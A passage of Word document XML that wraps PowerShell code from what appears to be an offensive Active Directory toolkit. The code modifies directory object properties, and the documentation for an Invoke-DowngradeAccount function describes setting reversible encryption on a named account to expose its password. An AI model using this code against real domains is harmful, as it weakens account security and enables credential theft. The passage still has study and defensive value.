    <w:p w14:paraId="0FC3431D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SamAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F26EB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F8DA795" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7863082B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3D625E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FF376A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1BE1F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7F5BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E5AC13B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB3B40C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F125D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C406A1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E334C14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA4C91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PropertyName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D584471" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E46A73A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PropertyValue,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A1F6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48E4A41D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0678CE9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PropertyXorValue,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639B5452" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58FEAE38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E91C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ClearValue,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DB6DA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E0ADB96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196F89C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC60D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB448F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23720DEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698CE6D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8059E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20053182" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02490C1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Arguments = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47627DBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'SID' = $SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287EA743" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Name' = $Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE37987" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'SamAccountName' = $SamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB9EEC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A096398" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'DomainController' = $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E6CE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Filter' = $Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E4939C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'PageSize' = $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FFC2A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Credential' = $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA771A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F17E767" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # splat the appropriate arguments to Get-ADObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131534C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $RawObject = Get-ADObject -ReturnRaw @Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96B8BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A33EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E70250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get the modifiable object for this search result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44506A2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Entry = $RawObject.GetDirectoryEntry()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05A273" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3603C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ClearValue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B8F48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Clearing value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F49A85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Entry.$PropertyName.clear()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D8A03B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Entry.commitchanges()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887CEF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B201D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04ABB83A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($PropertyXorValue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC74BAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TypeName = $Entry.$PropertyName[0].GetType().name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAF3E68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FFA00B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # UAC value references- https://support.microsoft.com/en-us/kb/305144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA134C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C30189" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Entry.$PropertyName = $PropertyValue -as $TypeName       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E9DB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Entry.commitchanges()     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95511D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455CB5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A674BC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D31CCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Entry.put($PropertyName, $PropertyValue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79051347" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Entry.setinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C18227" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AAF9A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3802DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D29C8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Warning "Error setting property $PropertyName to value '$PropertyValue' for object $($RawObject.Properties.samaccountname) : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCC6C8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CE77C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F97BD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1610508E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0AEF17A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function Invoke-DowngradeAccount {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B20C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D48A11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C194FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E7D1CC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Set reversible encryption on a given account and then force the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4DB1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        to be set on next user login. To repair use "-Repair".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1636E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E45408A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C9DB4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57EF0BC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The SamAccountName of the domain object you're querying for. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A31C2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="747C7FC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673ECD2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F526075" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The Name of the domain object you're querying for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B6748" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55C61BE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C288811" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29F8BB49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for objects, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4635A175" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="127FD95A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC20EFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="28C5C9B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D84819" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7252C005" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D70F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12034BA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Additional LDAP filter string for the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23795D98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02085E99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Repair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1621C6E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="28D89C62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Switch. Unset the reversible encryption flag and force password reset flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F42DE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A90AEC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E28A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27B9EA54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F6EAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42260511" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="479D40AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C73570" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="535A0EE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS&gt; Invoke-DowngradeAccount -SamAccountName jason</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FAD8FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72631B4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Set reversible encryption on the 'jason' account and force the password to be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1B5E6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38021C0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA9E6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="009C7991" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS&gt; Invoke-DowngradeAccount -SamAccountName jason -Repair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF06B79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B57B27C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Unset reversible encryption on the 'jason' account and remove the forced password change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6726DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664AA5FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58CE62C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B048E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9B33E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'SamAccountName', Position=0, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E0586" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7076CD43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SamAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD6D5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50496386" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Name')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BE43F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0132F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1CEB29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26764BC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2344E602" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2538ABBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A20BF9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256390A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B01281" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38C2CA89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
